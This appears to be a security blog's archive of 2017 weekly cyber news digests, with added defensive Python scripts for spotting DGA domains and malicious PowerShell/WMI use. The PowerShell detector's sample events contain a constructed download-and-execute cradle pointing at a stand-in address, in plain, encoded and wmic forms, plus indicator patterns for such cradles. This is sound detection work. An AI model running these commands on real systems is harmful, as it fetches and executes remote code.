Tuesday, December 26, 2017

iNews - Around The World This Week

                       

Date – 24th December, 2017
1)     Russia's Fancy Bear APT Group Gets More Dangerous – Fancy Bear, the Russian advanced persistent threat group associated with the infamous intrusion at the Democratic National Committee last year among numerous other break-ins, may have become a little more dangerous. Encryption and code refreshes to the group's main attack tool have made it stealthier and harder to stop, ESET says. The fourth and latest version of the malware comes with new techniques for obfuscating strings and all run-time type information, which ESET says have significantly improved the malware's encryption and obfuscation. The Fancy Bear/Sednit group has also upgraded some of the code used for command and control (C&C) and added a domain generation algorithm (DGA) for quickly creating fallback C&C domains when the hard-coded ones are taken down.
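DGA-generated fallback domains tend to stand out in DNS logs as a burst of never-seen, high-entropy, vowel-poor names from a single host. The script below is added here as an illustration and is not taken from ESET's analysis: it scores second-level labels with a few lexical heuristics and flags clients that query several such names in one log excerpt. The log lines and the flagged names are constructed for the example, and the thresholds are assumptions to tune against your own traffic.

```python
import math
from collections import defaultdict

# Constructed DNS log excerpt (not from the ESET report). Assumed format:
# "<timestamp> <client_ip> <queried_name>", one query per line.
SAMPLE_DNS_LOG = """\
2017-12-20T10:01:02Z 10.0.0.15 www.example.com
2017-12-20T10:01:03Z 10.0.0.15 mail.example.com
2017-12-20T10:01:05Z 10.0.0.15 login.microsoftonline.com
2017-12-20T10:01:09Z 10.0.0.22 xq7vkz9mpt3rd.net
2017-12-20T10:01:10Z 10.0.0.22 kwjx8rtpz2ml.com
2017-12-20T10:01:11Z 10.0.0.22 b7tq3zxvlpm9.org
2017-12-20T10:01:15Z 10.0.0.15 cdn.example.org
2017-12-20T10:02:01Z 10.0.0.22 fjdk39slaqpzm.com
"""

VOWELS = set("aeiou")


def shannon_entropy(s: str) -> float:
    """Bits per character; random-looking labels score higher than dictionary words."""
    if not s:
        return 0.0
    n = len(s)
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def longest_consonant_run(s: str) -> int:
    """Length of the longest run of consonant letters (digits and vowels break a run)."""
    best = run = 0
    for ch in s:
        if ch.isalpha() and ch not in VOWELS:
            run += 1
            best = max(best, run)
        else:
            run = 0
    return best


def score_label(label: str) -> int:
    """Count lexical DGA indicators in one DNS label (0-4). The cut-offs are assumptions."""
    label = label.lower()
    letters = [c for c in label if c.isalpha()]
    score = 0
    if shannon_entropy(label) >= 3.0:
        score += 1
    if letters and sum(c in VOWELS for c in letters) / len(letters) < 0.25:
        score += 1
    if letters and any(c.isdigit() for c in label):
        score += 1
    if longest_consonant_run(label) >= 4:
        score += 1
    return score


def second_level_label(fqdn: str) -> str:
    """Label directly under the TLD; naive (no public-suffix list), so co.uk-style names need care."""
    parts = fqdn.rstrip(".").lower().split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def find_dga_candidates(log_text: str, label_threshold: int = 3, burst_threshold: int = 3) -> dict:
    """Return {client_ip: [suspicious domains]} for clients that query several DGA-like names."""
    per_client = defaultdict(set)
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 3:
            continue  # skip malformed lines rather than guessing at them
        _ts, client, qname = fields
        if score_label(second_level_label(qname)) >= label_threshold:
            per_client[client].add(qname.lower())
    return {c: sorted(d) for c, d in per_client.items() if len(d) >= burst_threshold}


if __name__ == "__main__":
    for client, domains in find_dga_candidates(SAMPLE_DNS_LOG).items():
        print(f"{client}: {len(domains)} DGA-like queries -> {', '.join(domains)}")
```

Entropy alone is a poor discriminator (long legitimate labels such as microsoftonline score above 3 bits), which is why the flag requires several indicators to coincide and a burst of distinct names from one client; a real deployment would add an allow-list of known-good domains and a sliding time window.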

2)     Cybersecurity: A priority area for the Indian Government - India’s rapid transition towards a digital economy, coupled with national projects like Digital India, Smart Cities, National Broadband Network and so on, is altering the digital landscape rapidly, with direct impact on governance, transparency, and accountability. With the drive towards a digital economy, a large amount of consumer and citizen data will be stored digitally, and many transactions will be carried out online by individuals, companies, and government departments. This rapid change towards a digital environment has brought to the fore security risks and concerns, particularly for the cybersecurity of individuals and of the nation.

3)     Comprehensive Endpoint Protection Requires the Right Cyber Threat Intelligence - A recent report from Grand View Research predicts that the cyber threat intelligence (CTI) market will reach $12.6 billion by 2025. This growth in demand isn't surprising when you consider the ongoing success of so many high-profile and extremely damaging attacks. This climate of increasingly sophisticated breaches has moved many organizations — particularly, those that handle and retain sensitive data — to upgrade their cybersecurity measures by adding CTI and incident forensics. CTI falls into three main categories -- tactical, operational, and strategic -- and answers questions related to the "who, what, and why" of a cyber-attack.

4)     Fileless Malware Attacks Hit Milestone in 2017 - Fileless malware attacks using PowerShell or Windows Management Instrumentation (WMI) tools accounted for 52% of all attacks this year, beating out malware-based attacks for the first time, according to Carbon Black's 2017 Threat Report. Non-malware attacks account for the majority of all attacks this year, and ransomware grows to a $5 billion industry, new data shows. Kryptik, Strictor, Nemucod, Emotet, and Skeeyah were the five top malware families this year, according to the report. And the top three industries hit this year by malware authors included finance, healthcare, and retail.
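Most of the PowerShell and WMI activity behind the Carbon Black numbers still leaves a process-creation trail even when nothing is written to disk, so detection moves from files to command lines and parent/child relationships. The script below is an added example rather than anything from the report: it decodes -EncodedCommand payloads, matches a small set of indicator patterns against the plain and decoded command line, and weights an Office parent process. The event records are constructed (198.51.100.7 is from a documentation address range), and the indicator list and the two-indicator threshold are assumptions to extend from your own telemetry.

```python
import base64
import re
from typing import Optional

# Constructed process-creation events (Sysmon Event ID 1-style fields, simplified).
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/s')"
PAYLOAD_B64 = base64.b64encode(PAYLOAD.encode("utf-16le")).decode()

SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\Scripts\nightly-backup.ps1"},
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": f"powershell.exe -nop -w hidden -enc {PAYLOAD_B64}"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": 'wmic.exe process call create "powershell -nop -c ' + PAYLOAD + '"'},
    {"parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": "wmic.exe os get Caption,Version"},
]

# Assumed lists; extend from your own environment.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wmic.exe"}

# PowerShell accepts any unambiguous prefix of -EncodedCommand, hence the alternation.
ENC_FLAG = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)

# (name, pattern) matched case-insensitively against the command line plus any decoded payload.
INDICATORS = [
    ("encoded-command", ENC_FLAG),
    ("hidden-window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("no-profile", re.compile(r"-nop(?:rofile)?\b", re.I)),
    ("policy-bypass", re.compile(r"-e(?:xecution)?p(?:olicy)?\s+bypass", re.I)),
    ("invoke-expression", re.compile(r"\b(?:iex|invoke-expression)\b", re.I)),
    ("download-cradle", re.compile(r"downloadstring|downloadfile|net\.webclient|invoke-webrequest|\biwr\b", re.I)),
    ("wmi-process-create", re.compile(r"\bprocess\s+call\s+create\b", re.I)),
]


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """-EncodedCommand carries base64 of UTF-16LE script text; return it decoded, or None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def analyze(event: dict) -> dict:
    """Score one process-creation event; flagged when two or more indicators line up."""
    reasons = []
    decoded = None
    if basename(event["image"]) in SCRIPT_HOSTS:
        decoded = decode_encoded_command(event["cmdline"])
        haystack = event["cmdline"] + ("\n" + decoded if decoded else "")
        reasons = [name for name, rx in INDICATORS if rx.search(haystack)]
        if basename(event["parent"]) in OFFICE_PARENTS:
            reasons.append("office-parent")
    return {"flagged": len(reasons) >= 2, "reasons": reasons, "decoded": decoded}


def scan(events) -> list:
    """Return the flagged events with their image, parent and reasons, in input order."""
    hits = []
    for event in events:
        verdict = analyze(event)
        if verdict["flagged"]:
            hits.append({"image": basename(event["image"]), "parent": basename(event["parent"]), **verdict})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(f"{hit['parent']} -> {hit['image']}: {', '.join(hit['reasons'])}")
        if hit["decoded"]:
            print("  decoded:", hit["decoded"])
```

The decode step matters more than the pattern list: a single -EncodedCommand hides every other indicator until it is expanded, and Script Block Logging (Event ID 4104) gives the same visibility on hosts where command lines are truncated or obfuscated further.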

5)     Google Sheds Light on Data Encryption Practices - Google explains the details of how it secures information in the cloud and encrypts data in transit. Following a year of major cyberattacks and security threats, Google has published two whitepapers to explain how it secures data. One focuses on encryption of data in transit; the other on service-to-service communication using Application Layer Transport Security (ALTS).

6)     What's next for cybersecurity in 2018? - We live in a networked world, where companies rely on networked systems and their data is stored in the cloud. The year 2018 will bring more connectivity, digital transformation initiatives, and data to companies, along with a number of new cybersecurity threats and landscape changes, making cybersecurity one of the most crucial issues to address.

7)     CROOKS SWITCH FROM RANSOMWARE TO CRYPTOCURRENCY MINING - Criminals behind the VenusLocker ransomware have switched to cryptocurrency mining in their latest campaign targeting computer users in South Korea. Instead of attempting to infect targeted computers with ransomware, the group is now trying to install malware on PCs that mines for Monero, an open-source cryptocurrency. Researchers said the shift by threat actors is also spurred by anti-ransomware mitigation efforts that have made infecting systems with malware harder.

8)     Digital Transformation Emboldens Cyber Adversaries—Can Cybersecurity Keep Up? - Businesses are accelerating their digital transformation, seeking to leverage their online presence to enrich products, deepen customer relationships, and boost their brand ecosystems. However, with this rapid growth comes difficulty. As organizations expand into digital channels, their digital footprint, i.e., all their external-facing assets including websites, email servers, social landing pages, and pages created outside proper protocol, also expands to potentially unmanageable proportions.

9)     The Internet of Things Is Going to Change Everything About Cybersecurity - Cybersecurity can cause organizational migraines. In 2016, breaches cost businesses nearly $4 billion and exposed an average of 24,000 records per incident. In 2017, the number of breaches is anticipated to rise by 36%. The constant drumbeat of threats and attacks is becoming so mainstream that businesses are expected to invest more than $93 billion in cyber defenses by 2018. Even Congress is acting more quickly to pass laws that will — hopefully — improve the situation. Despite increased spending and innovation in the cybersecurity market, there is every indication that the situation will only worsen. The number of unmanaged devices being introduced onto networks daily is increasing by orders of magnitude, with Gartner predicting there will be 20 billion in use by 2020.

10)  How AI is the Future of Cybersecurity - The frightening truth about increasingly common cyber-attacks is that most businesses, and the cybersecurity industry itself, are not prepared. Beyond the lack of preparedness at the business level, the cybersecurity workforce is also having an incredibly hard time keeping up with demand. By 2021, there are estimated to be an astounding 3.5 million unfilled cybersecurity positions worldwide.


Courtesy - Ivalue.



Thursday, December 21, 2017

Right to Privacy:

Right to Privacy: Why This Is a Big Win for People and Security of Their Personal Data

“You can’t have privacy without security” Larry Page, Google’s CEO, famously said at a TED Conference, a few years ago.
Today, closer to home, that rings true. 
A few months ago, when the Supreme Court recognized the Right to Privacy as a fundamental right under the Indian Constitution, it marked a great first step towards recognizing the increasing—and often neglected—need to strengthen security to protect data and privacy.
Never before has there been a clarion call to create a robust regime for data protection. That’s something the Supreme Court has demanded of Indian organizations and the government. I think that’s quite significant.
That presents a remarkable opportunity for Indian organizations to step up their security efforts, and at the same time, build a culture that upholds the need to protect customer data. 
It evidently means here’s a chance for Indian companies to create a solid framework and a strong cybersecurity policy that ensures data protection. That, in itself, is a big win for the privacy of personal data.
Much to Gain
In the age of social media and e-commerce, as data increasingly becomes a commodity, protecting this data also becomes an imperative.
Simply put, the more important data becomes, the more important are the tools to protect data.
And when customers are confident that their data is in safe hands, they are more than willing to part with it. For businesses, this is an indicator of customer trust, which boosts customer retention and new customer acquisition, leading to increased revenue.
Recently, Nasscom’s President R. Chandrashekhar said that the Supreme Court ruling significantly boosts India’s attractiveness as a safe destination for global sourcing, which according to him is “another win”. As a growing digital economy, that’s great news for Indian businesses that can take advantage of increased customer confidence. 
Outside Indian shores, the European Union’s General Data Protection Regulation (GDPR) requires all businesses, anywhere in the world, that collect personal data of individuals in the EU to become fully accountable for protecting it. With the Right to Privacy ruling, Indian businesses that cater to the European market will feel a step closer to GDPR compliance.
Protecting Customer Privacy
In order to preserve the essence of privacy, Indian organizations need to provide an increased sense of visibility and control over confidential customer data.
To do so, they need to first recognize and assess the hands that hold customer data: Your employees.
That means there needs to be an increased focus on the people who create, touch and move customer data. One way to do that is to turn to Behavioral Analytics. It helps organizations monitor how their employees are handling customer data and detect suspicious behaviour.
That’s even more pertinent now that customer data has become the lifeline of most organizations. Industries like telecom, financial and healthcare services, e-commerce firms and government agencies that collect a large amount of sensitive personal data will have to re-evaluate their data strategy.
They will have to provision for new norms that vow to protect customer data and privacy, first and foremost. The Right to Privacy ruling has opened new doors for businesses by providing an opportunity to strengthen security to protect privacy, and thereby gain customer confidence.

Monday, December 18, 2017

iNews - Around The World This Week

1)     TRITON Malware Targeting Critical Infrastructure Could Cause Physical Damage – Security researchers have uncovered another nasty piece of malware designed specifically to target industrial control systems (ICS) with a potential to cause health and life-threatening accidents. Dubbed Triton, also known as Trisis, the ICS malware has been designed to target Triconex Safety Instrumented System (SIS) controllers —an autonomous control system that independently monitors the performance of critical systems and takes immediate actions automatically, if a dangerous state is detected. According to separate research conducted by ICS cybersecurity firm Dragos, which calls this malware "TRISIS," the attack was launched against an industrial organization in the Middle East.

2)     Newly Uncovered 'MoneyTaker' Hacker Group Stole Millions from U.S. & Russian Banks - Security researchers have uncovered a previously undetected group of Russian-speaking hackers that has silently been targeting Banks, financial institutions, and legal firms, primarily in the United States, UK, and Russia. In the past 18 months, the hacking group is believed to have conducted more than 20 attacks against various financial organizations—stolen more than $11 Million and sensitive documents that could be used for next attacks. Since its first successful attack in May last year, MoneyTaker has targeted banks in California, Illinois, Utah, Oklahoma, Colorado, South Carolina, Missouri, North Carolina, Virginia and Florida, primarily targeting small community banks with limited cyber defenses.

3)     Security Flaw Left Major Banking Apps Vulnerable to MiTM Attacks Over SSL - A team of security researchers has discovered a critical implementation flaw in major mobile banking applications that left the banking credentials of millions of users exposed to attackers on the same network. The affected apps include those of HSBC, NatWest, Co-op, Santander, and Allied Irish Bank, all of which have been updated since the researchers reported the issue to them. SSL pinning is a defence against man-in-the-middle (MITM) attacks: the app ships with the certificate or public key it expects from its servers and refuses any other, so an attacker presenting a certificate for the bank's hostname issued by a rogue or compromised certification authority is still rejected. The protection only holds if the pinning check itself is implemented correctly; a broken pin check can leave an app no better off than one that pins nothing.

4)     Here's where 'Smart Hospitals' will make big tech investments in the near future - Building on top of today’s digital infrastructure, Smart Hospitals will focus on patient experience, outcomes and the Triple Aim, and they’ll make expensive acquisitions between now and 2025. Smart hospitals optimize, redesign, or build new clinical processes, management systems and potentially infrastructure, enabled by underlying digitized networking of interconnected assets, to provide a valuable service or insight that was not possible or available earlier, and so achieve better patient care, experience, and operational efficiency. Digital transformation is happening in almost every industry and healthcare is no exception. Analyst house IDC earlier this year pegged the global digital transformation (DX) market at as much as $20 trillion in the coming years.

5)     The next big thing in pharmacy supply chain: Blockchain - With $200 billion lost to counterfeit drugs annually and patient safety issues, a chain-of-custody log that blockchain could enable holds promise. Blockchain has the potential to transform healthcare in general and the pharmacy supply chain in particular. The distributed ledger technology could offer legislative, logistical and patient safety benefits for pharmaceutical supply chain management. From a regulatory perspective in the United States, blockchain technological and structural capabilities, in fact, extraordinarily map to the key requirements of the Drug Supply Chain Security Act.

6)     Healthcare Faces Poor Cybersecurity Prognosis - The healthcare industry is underestimating security threats as attackers continue to seek data and monetary gain. Threat actors rarely attack with the intent of causing physical harm; most are looking for financial gain. eSentire reports patient records are worth between $0.05 and $2.42 USD each. Attackers can sell them on the Dark Web, use them for tax fraud or blackmail, or for conducting spear phishing campaigns. Opportunistic attacks are common because of the number of vulnerable devices.

7)     As India Surveys Bitcoin Exchanges, West Toughens Its Regulations - Once voiced by a cryptocurrency enthusiast, “Bitcoin will do to banks what email did to the postal industry” has now been raised by Israel’s Prime Minister Benjamin Netanyahu while speaking of cryptocurrencies, exchanges and cryptocurrency regulations. “Is the fate of banks that they will eventually disappear? Yes. The answer is Yes. Does it need to happen tomorrow? And do we need to do it through Bitcoin? That’s a question mark!” stated the PM.

8)     Kaspersky Lab Detects 360,000 new Malicious Files Daily - The number of daily detected malicious files reflects the average activity of cybercriminals involved in the creation and distribution of malware. This figure was calculated for the first time in 2011 and totaled 70,000 at that time. Since then it has grown five-fold, and as the 2017 data shows, it is still increasing. Most of the files identified as dangerous fall into the malware category (78 percent). However, viruses – whose prevalence dropped significantly 5-7 years ago due to their complex development and low efficiency – still constitute 14 percent of daily detections.

9)     USB Encryption and Security Falls Well Short - A recent survey from Apricorn of more than 400 IT professionals from industries including education, finance, government, healthcare, legal, manufacturing and retail reveals that most employees use USB drives, but that companies are leaving themselves open to data breaches and leaks by not effectively monitoring these devices and the data that gets written to them. Eight out of 10 employees use non-encrypted USB drives, such as those handed out free at conferences, trade shows or business meetings, which can easily be lost or stolen and fall into the wrong hands, or introduce malware into a company’s systems.

10)  We need to talk about mathematical backdoors in encryption algorithms - Governments and intelligence agencies strive to control and bypass or circumvent cryptographic protection of data and communications. Backdooring encryption algorithms is considered as the best way to enforce cryptographic control. Security researchers regularly set out to find implementation problems in cryptographic algorithms, but not enough effort is going towards the search for mathematical backdoors, two cryptography professors have argued.


Credits - Nagesh of Ivalue.

Tuesday, November 21, 2017

Another Business Email Compromise

Export company’s email ID hacked, $36.8k siphoned off

Friday, October 6, 2017

To Err is Human or The Insider?

What’s the similarity between Bradley Manning and Edward Snowden? Well, apart from the fact that both disclosed sensitive information about the US government or its various arms and were hailed as “whistleblowers” by some and slammed and persecuted by their own government, they were also quintessential “insiders”. Or, to put it simply, people who ended up leaking classified information about the very same organization that they worked for.

Surprised? Welcome to the world of insider threats, a kind that is perhaps the most under-appreciated of cyber threats since they mostly fly under the radar as stories about hackers and other criminal actors grab the headlines.

According to the SANS Institute, one-third of enterprises have suffered from an insider caused breach, with possible losses from each incident amounting to more than $5 million. Research firm Gartner says that more than 70% of unauthorized access to data is committed by an organization's own employees. These are good enough indicators to gauge the level of threat that insiders pose.

Insider attacks, be it from a disgruntled employee or an absent-minded manager, are more insidious because they betray the trust the organization has in its employees and partners. They are also harder to detect and take longer to discover than any other type of threat. Also, this threat simply can’t be wished away as every organization needs employees and partners who will need access to sensitive information to do their jobs effectively.

Besides, not all insiders have a malicious intent. Often, data loss happens due to unintentional mistakes made by people—accidental insiders—or users whose credentials have been compromised or stolen—compromised insiders.
Alas, the existing approach to information security relies heavily on protecting the technology infrastructure, which while needed will not solve this insider threat.
So, what can organizations do about it? How can they counter such threats?
The Human Point
The answer perhaps lies in having a more human-centric approach. To protect and secure data from such insider threats, a new approach is required where the focus needs to be on understanding the points in which trusted people – employees, partners, and contractors – interact with critical business data and intellectual property. It is human points of interaction where businesses see critical data as most valuable. And these are precisely the points where the data is also the most vulnerable.
Learning how users interact with critical data has to become a priority for security professionals. And while there’s agreement that understanding behavior and intent is vital to cyber security, most security professionals are unable to do so effectively as it is an entirely new security paradigm.
To effectively counter insider threats, intelligent integrated systems are needed that provide visibility into user behavior and uncover intent by providing the context behind a user’s actions. These systems of integrated solutions, when coupled with comprehensive cyber security programs, can secure today’s mobile workforce, reduce the incident management burden on IT teams, increase the value of new security investments, and provide proactive security that promotes innovation within the organization.
It’s time businesses start adopting this new approach to security and have intelligent systems that allow good employee behavior and facilitate business while stopping bad cyber behaviors.

And the time to start was perhaps yesterday. Else, tomorrow the next Bradley Manning or Edward Snowden might come from your organization.
reproduced from - https://tinyurl.com/y9jjf467

Sunday, January 8, 2017

Issue 98- Week of Jan 2nd


1.      KillDisk - the world's biggest Ransomware?: KillDisk malware was originally used in the Ukraine energy attacks of 2015. Now researchers have found a Linux variant of it, which makes the Linux machine unbootable. It also demands an unusually high ransom of 222 BTC (approx. $200K). Prevention is the best solution to Ransomware. Regular backups and good web security solutions are recommended.

2.      Koolova Ransomware: Users infected with this Ransomware can obtain the decryption key for free if they read two articles about Ransomware. This certainly is not the best way to build awareness about Ransomware. 'Popcorn time', another interesting Ransomware in news last month required the victim to infect two others to obtain the decryption key for free.

3.      Ransomware in Schools: In the UK, cybercriminals pretending to be Govt. officials have been cold-calling schools to obtain the email ids of key staff, in order to email them 'supposedly' important docs. These docs actually contain malware which encrypts the school's machines. The hackers then demand a ransom of £8000. Similar scams are run by sending malware-infected fake POs to sales organizations and fake resumes to HR depts.

4.      Mongo DB under attack: Older MongoDB installations shipped with authentication disabled and listened on every network interface by default, so anyone who could reach the port could read and write the database. Newer releases changed the defaults, but many admins never reconfigured or upgraded. Attackers are now wiping such exposed databases, often without keeping a copy, and demanding a ransom of 0.2 BTC (about $150) to 'return' data they may never have taken. Thousands of databases have been affected; enabling authentication, binding to an internal interface and upgrading MongoDB are strongly recommended.
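The exposure described above comes down to two settings in mongod.conf. The fragments below are added here for illustration and are not taken from the original item: the first YAML document shows the permissive combination, the second the hardened equivalent (the two documents are separated by ---). The port and the bindIp values are illustrative.

```yaml
# Permissive: anyone who can reach TCP/27017 gets full read/write access.
net:
  port: 27017
  bindIp: 0.0.0.0
security:
  authorization: disabled
---
# Hardened: listen only where the application servers can reach, and
# require every client to authenticate.
net:
  port: 27017
  bindIp: 127.0.0.1        # or the private interface the app tier uses
security:
  authorization: enabled
```

After switching authorization to enabled, create an administrative user with db.createUser() on the admin database before the restart (otherwise the localhost exception is the only way back in), and put a host firewall in front of 27017 so only application servers can connect. Regular, tested backups are what actually make the ransom note irrelevant.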

5.      Tech support scam hits Mac: Users not on the latest Mac OS are prone to this malware infection, which opens draft email windows with the subject line "Virus detected, call support on +1-800-xyz" over and over until the laptop runs out of memory and crashes. The trick is to get the victims to call, then scare them into buying support they do not need. See image below.

6.      D-Link Sued: After the recent massive DDoS attacks, the US watchdog FTC has sued D-Link for its poor security. This move by the FTC will go a long way in improving the security of IoT devices, which manufacturers have not taken very seriously - most likely to keep their costs low. Default passwords allow hackers to break in easily; it is strongly recommended to change them.

7.      FTC announces $25K reward: Keeping in mind the role IoT played in the recent massive DDoS attacks, FTC has announced a reward of $25K to anyone who can create a solution that will patch all vulnerable IoT devices. A serious challenge in IoT is that many of these devices do not have ability to be patched remotely. Issue 88 - we saw a Chinese company admitting its products were misused to launch the DYN attack, later the company recalled some of the devices.

8.      Netgear announces Bug Bounty program: Last week, Netgear launched its Bug Bounty program, in which it will reward hackers up to $15K for responsible reporting of flaws found in its products. Several companies offer such programs; the largest public payouts come from Zerodium, which is an exploit broker rather than a vendor bug bounty and offers up to $1.5M for iOS 10 zero-day exploits.

9.      Critical RCE bugs patched: Websites using PHPMailer, SwiftMailer or Zend Mail were vulnerable to a Remote Code Execution (RCE) bug. Through ordinary contact or registration forms that send mail, attackers could run arbitrary code on the web server and compromise the site. All three libraries have now been patched; admins should update.

10.   India's pitch to Google: India's IT minister told the visiting Google CEO to play a 'more meaningful' role in countering cyber threats. Experts are not sure what exactly a company like Google can do to increase cyber security. As India is rapidly moving towards digitalization, the cyber-threats will grow disproportionately. 'Digital India' will slow down if these threats become widespread and real.


Sunday, January 1, 2017

Issue 97- Week of Dec 26th - Happy New Year


1.      US Election hacking fallout: The US expelled 35 diplomatic personnel from the Russian embassy last week; it is alleged these Russians interfered in the US presidential election by hacking the DNC. Russia did not respond with the usual tit for tat but trolled President Obama by calling him a lame duck.

2.      Super Mario Run APK is a malware: Nintendo's 'Super Mario Run' was released recently for iOS devices only. Some Mario lovers went looking for an Android version of the game outside the Google Play Store and ended up with malware. This malware can take full control of the Android device. It is advised to wait for the official version on the Play Store.

3.      Lithuania computers infected with Russian Spyware: Reuters reports that Lithuania has accused Russia of cyber-attacks on its Government networks. Lithuania fears Russia is trying to infiltrate its political sphere. Russia has rejected this as laughable and unsubstantiated. Meanwhile in Germany, its intelligence service believes Russia may interfere in its national elections in 2017.

4.      Application for Marijuana seller's details leaked: Recreational marijuana is legal in Nevada. Details from the 11,700 reseller applications that the Nevada state government had received were easily accessible via Google on the State Government's website. Experts are not willing to call this a cyber-hack. The site is currently down.

5.      Another DDoS attack: For most of 2016, DDoS attacks were launched using the Mirai botnet of hacked IoT devices. Last week a 650Gbps attack was launched using a new botnet called Leet Botnet. Issue 84 - A 1.5Tbps attack was launched on France-based hosting provider OVH and Issue 87 - DNS provider DYN suffered a massive DDoS attack.

6.      Android Trojan infects Wi-Fi router: A new Android Trojan called Switcher comes in disguised apps and does not affect the device but targets the Wi-Fi router it is connected to. It changes the DNS settings of the router to redirect traffic to malicious websites. Issue 95 - we saw something similar called 'DNS Changer' - where the router was attacked via a PC. Issue 94 - we saw Stegano Malvertising redirecting traffic.

7.      Amazon Echo's help required to solve murder case: Amazon Echo is a smart device that responds to voice commands. This device was being used in a home where a murder took place. The police have issued a warrant to Amazon to hand over the voice recordings from around the suspected time of the murder. Amazon has declined. This sounds very similar to the Apple v/s FBI case, wherein Apple declined to unlock the San Bernardino terrorist's iPhone.

8.      InterContinental Hotels may have been hacked: After a debit and credit card fraud pattern was found at some of the InterContinental properties - the hotel has launched an investigation.  Kimpton Hotels & HEI Hotels & Resorts (which operates Marriott, Hyatt and Sheraton and Westin hotels) recently suffered PoS breach.

9.      Critical flaws in PHP 7 detected: Experts have found 3 critical 'Zero Day' vulnerabilities in PHP 7. Two of the flaws allow hackers to take full control of the web server and steal data. The third flaw helps in DoS attack shutting down the server. PHP was notified about these flaws in Sep and as of now they all have been patched.

10.   Security and demonetization: Recall the story we discussed in Issue 49 - wherein a Bangalore businessman's account was hacked and $70K was stolen. The hackers were able to very easily obtain a duplicate SIM card of the businessman's phone number and then hack the bank account as the OTP was now being delivered to the criminals. With Demonetization and Digital India - thousands are embracing e-wallets and online transactions every day. Criminals now have a much wider attack surface, one should stay alert to prevent such hacks.


Source - idtheftcenter.org